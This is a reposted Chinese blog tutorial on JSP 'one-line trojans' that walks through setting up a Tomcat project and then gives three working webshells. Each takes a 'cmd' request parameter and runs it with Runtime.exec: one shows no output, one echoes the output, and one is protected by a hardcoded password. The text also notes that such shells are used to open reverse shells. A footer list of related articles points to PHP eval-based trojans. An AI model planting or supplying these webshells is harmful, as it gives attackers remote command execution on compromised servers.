iis服务器助手广告广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > JAVA >java安全——jsp一句话木马
  • 807

0
分享到

java安全——jsp一句话木马

java安全servlet 2023-10-23 18:10:50 807人浏览 泡泡鱼
摘要

jsp回显一句话木马 文章目录 jsp回显一句话木马一、搭建web服务1、创建空白maven项目,搭建本地tomcat2、引入servlet的pom依赖 二、无回显一句话三、带回显一句话三

jsp回显一句话木马

文章目录

提示:以下是本篇文章正文内容,下面案例可供参考

一、搭建WEB服务

1、创建空白Maven项目,搭建本地Tomcat

在这里插入图片描述

在这里插入图片描述

2、引入servlet的pom依赖

在这里插入图片描述

二、无回显一句话

 <%    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));%>

Http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
在这里插入图片描述

三、带回显一句话

代码如下(示例):

  <%    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//    System.out.println(process);    InputStream inputStream = process.getInputStream();    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));    String line;    while ((line = bufferedReader.readLine()) != null){      response.getWriter().println(line);    }  %>

在这里插入图片描述

三、有密码带回显一句话

  <%    if ("passWord".equals(request.getParameter("pass"))){      Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));//    System.out.println(process);      InputStream inputStream = process.getInputStream();      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));      String line;      while ((line = bufferedReader.readLine()) != null){        response.getWriter().println(line);      }    }  %>

在这里插入图片描述

来源地址:https://blog.csdn.net/m0_46317063/article/details/128816033

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: java安全——jsp一句话木马

本文链接: https://www.lsjlt.com/news/440705.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • java安全——jsp一句话木马
    jsp回显一句话木马 文章目录 jsp回显一句话木马一、搭建web服务1、创建空白maven项目,搭建本地tomcat2、引入servlet的pom依赖 二、无回显一句话三、带回显一句话三...
    99+
    2023-10-23
    java 安全 servlet
  • 一句话木马大全
    PHP       //可执行命令一句话 普通一句话 ​​​ PHP系列 ​​​​​​​​   密码是 -7 过狗一句话 select '' into outfile 'C:/Inetpub/wwwroot/mysql-...
    99+
    2023-10-21
    php 开发语言
  • PHP一句话木马浅析
    一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。PHP一句话木马的原理是利用了PHP中的eval()。 一句话木...
    99+
    2023-09-07
    php 开发语言 Powered by 金山文档
  • Java中JS引擎实现的一句话木马
    目录前言基本原理获取脚本引擎绑定对象eval基本语法调用Java方法导入Java类型创建Java类型的数组导入Java类方法调用与重载Payload结构设计语法问题的坑两种语言对象间...
    99+
    2024-04-02
  • php一句话木马变形技巧
    目录一、什么是一句话木马?二、我们如何发送命令,发送的命令如何执行?0.eval函数1.assert函数2.create_function函数3. call_user_func回调函...
    99+
    2024-04-02
  • eval与assert执行一句话木马
    首先介绍一下木马中最简单的存在,俗称一句话木马 eval() eval(str)是把str字符串按照php代码来计算或执行 该str字符串必须是合法的PHP代码,且必须以分号结尾 assert() assert()包含于头文件assert...
    99+
    2023-09-10
    php
  • eval与assert一句话木马分析
    eval与assert一句话木马分析 严正声明:本文仅限于技术讨论,严禁用于其他用途。 文章目录 eval与assert一句话木马分析前言一、eval定义和用法二、assert的定义与用法三、...
    99+
    2023-09-02
    php 开发语言
  • 蚁剑连接一句话木马演示
    需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句话木马 其他脚本语言的一句话木马使用过程和这个差别不大 在服务...
    99+
    2023-09-16
    安全 php 扫描测试工具 渗透测试
  • php图片一句话木马使用方法
    php图片一句话木马使用方法,PHP一句话: 1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']); 2、动态执行assert生成一个木马文件(隐藏性最好的一种)@$_GET['a']($_GET[...
    99+
    2023-09-06
    php木马 Powered by 金山文档
  • 【python实现生成隐藏的一句话木马】
      如今,各大杀毒软件死死的盯着那几个危险函数不放。但是还有些人喜欢通过检索 webshell 关键字这样批量去找,这就更不可能找到了。那么今天这个 webshell 的原理是什么呢?这个webshell的原理就是:每一行最后都有空格与制表...
    99+
    2023-10-06
    python php
  • PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
    一句话木马如下,利用文件上传漏洞,往目标网站上传该木马,即可获取和控制整个网站主机目录 语句解析 @符号 @符号表示后面的语句即使执行错误,也不报错。 eval()函数 eval()函数的作用是把括号内的字符串全部当作php代码来执行。 ...
    99+
    2023-08-31
    php 网络安全
  • 一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)
    在文件上传(upload)类ctf题中,相信大家都接触过一句话木马 那么具体它是扫描意思呢 POST 是html中标签的POST方法 在页面中,所有的POST方法都会由submit输入方式向action中的php文件返还信息,通...
    99+
    2023-09-03
    php 安全 开发语言 upload html5
  • 如何实现phpmyadmin弱密码导致一句话木马上传
    这篇文章将为大家详细讲解有关如何实现phpmyadmin弱密码导致一句话木马上传,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。1.打开phpmyadmin(一般防火墙不能...
    99+
    2024-04-02
  • 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
    1、常见漏洞分类  2、常见验证手段    可抓包后修改扩展名为图片格式,再上传可绕过验证。如:   可以修改php文件后缀为其他,再上传。如test.php.xxx  可对图片文件添加一句话木马,再修改为.php上传,会解析为图...
    99+
    2023-09-04
    php 安全 运维 linux
  • Java JSP 安全漏洞:防护您的 Web 应用程序
    JavaServer Pages (JSP) 是一种 Java 技术,用于创建动态的 Web 应用程序。JSP 脚本在服务器端执行,并在客户端渲染为 HTML。然而,JSP 应用程序容易受到各种安全漏洞的影响,这些漏洞可能导致数据泄露、代...
    99+
    2024-03-15
    JSP
  • Java安全之Tomcat6Filter内存马问题
    目录回顾Tomcat8打法探索Tomcat6与Tomcat8之间的区别回顾Tomcat8打法 先回顾下之前Tomcat789的打法 这里先抛开 7 8之间的区别, 在8中,最后add...
    99+
    2022-11-13
    Java安全Tomcat6 Filter内存马 Java Tomcat6内存马 Tomcat Filter内存马
  • 亚马逊一个人能搞起来吗安全吗
    注册商标:在创建商店之前,您需要注册商标,以确保您的商品和服务的可追溯性。您可以在商标注册机构处进行申请。 选择可靠的供应商:您需要选择可靠的供应商,以确保您的商品和服务的质量。您可以通过与供应商签订合同或评估其信用度来确保您选择的供应商...
    99+
    2023-10-27
    亚马逊 人能
  • 一文详解Java线程中的安全策略
    目录一、不可变对象二、线程封闭三、线程不安全类与写法四、线程安全-同步容器1. ArrayList -> Vector, Stack2. HashMap -> HashT...
    99+
    2024-04-02
  • 亚马逊账号和服务器名称一样吗安全吗
    1. 亚马逊账号和服务器名称的关系 亚马逊账号和服务器名称是两个不同的概念,它们之间没有直接的联系。亚马逊账号是您在亚马逊平台上注册的账号,用于购物、管理订单和访问其他亚马逊服务。而服务器名称是您在亚马逊云服务(AWS)上创建的服务器实例...
    99+
    2023-10-27
    亚马逊 账号 名称
  • 在亚马逊租服务器多少钱一年啊安全吗
    亚马逊提供的云计算服务是弹性、灵活、安全的,价格也相对合理。具体的价格取决于你选择的实例类型、地理位置、使用时间等因素。一般来说,亚马逊的EC2实例的价格从每小时几分钱到几美元不等,年费也会有相应的折扣。你可以在亚马逊的官方网站上查看不同实...
    99+
    2023-10-27
    亚马逊 服务器 钱一年
软考高级职称资格查询
iis服务器助手广告
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作